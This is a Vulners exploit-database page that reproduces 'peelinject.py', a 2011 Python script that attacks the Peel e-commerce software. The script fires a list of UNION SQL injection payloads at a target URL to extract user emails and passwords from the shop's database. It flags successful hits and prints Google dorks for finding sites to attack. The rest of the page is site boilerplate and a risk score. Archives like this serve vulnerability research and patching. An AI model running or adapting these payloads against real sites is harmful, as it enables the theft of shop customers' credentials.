Vulners
Lucene search
Peel E-Commerce / Shopping SQL Injection
`#!/usr/bin/python
# This was written for educational purpose and pentest only. Use it at your own risk.
# Author will be not responsible for any damage!
# !!! Special greetz for my friend sinner_01 !!!
# Toolname : peelinject.py
# Coder : baltazar a.k.a b4ltazar < [email protected]>
# Version : 0.1
# greetz for d3hydr8, rsauron, low1z, qk, marezzi, StRoNiX, t0r3x and all members of ex darkc0de.com and ljuska.org
# More vuln in next version
# So many vuln sites to find :)
#
import sys, os, re, time, urllib2
if sys.platform == 'linux' or sys.platform == 'linux2':
clearing = 'clear'
else:
clearing = 'cls'
os.system(clearing)
def logo():
print "\n|---------------------------------------------------------------|"
print "| b4ltazar[@]gmail[dot]com |"
print "| 02/2011 peelinject.py v.0.1 |"
print "| |"
print "|---------------------------------------------------------------|"
if len(sys.argv) !=2:
logo()
print "\nEx: ./peelinject.py http://www.site.com/\n"
sys.exit(1)
vulnsql = ["lire/index.php?rubid=1+union+all+select+0,concat_ws(char(58),email,mot_passe,0x62616c74617a6172),2+from+peel_utilisateurs--", "lire/index.php?rubid=1+union+all+select+concat_ws(char(58),email,mot_passe,0x62616c74617a6172),1,2+from+peel_utilisateurs--", "lire/index.php?rubid=1+and+1=2+union+all+select+concat_ws(char(58),email,mot_passe,0x62616c74617a6172),1,2,3+from+jld_utilisateurs--", "lire/index.php?rubid=1+union+all+select+0,concat_ws(char(58),email,mot_passe,0x62616c74617a6172)+from+peel_utilisateurs--", "lire/index.php?rubid=1+union+all+select+0,concat_ws(char(58),email,mot_passe,0x62616c74617a6172)+from+utilisateurs--", "index.php?rubid=1+union+all+select+0,concat_ws(char(58),email,mot_passe,0x62616c74617a6172),2+from+peel_utilisateurs--"]
site = sys.argv[1]
if site[:4] != "http":
site = "http://"+site
if site [-1] != "/":
site = site + "/"
logo()
print "\n[-] %s" % time.strftime("%X")
print "\n[+] Target:", site
print "[+]",len(vulnsql),"Vulns loaded "
print "[+] Starting scan ...\n"
for sql in vulnsql:
print "[+] Checking:" ,site+sql.replace("\n","")
try:
target = urllib2.urlopen(site+sql.replace("\n", "")).read()
if re.findall("baltazar", target):
print"[!] w00t!,w00t!: ",site+sql.replace("\n", "")
print
else:
print "[-] Sorry, can't exploit :("
print
except(urllib2.HTTPError):
pass
except(KeyboardInterrupt, SystemExit):
pass
print "[!] Use this google dork for finding targets\n"
print "\tinurl:lire/index.php?rubid="
print "\tinurl:/index.php?rubid=\n"
print "\n[-] %s" % time.strftime("%X")
`
Data
Build on a solid foundation with Vulners data
We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data
Api
Power your application with Vulners API
The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access
App
Assess and manage vulnerabilities with Vulners tools
Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation
22 Feb 2011 00:00Current
0.4Low risk
Vulners AI Score0.4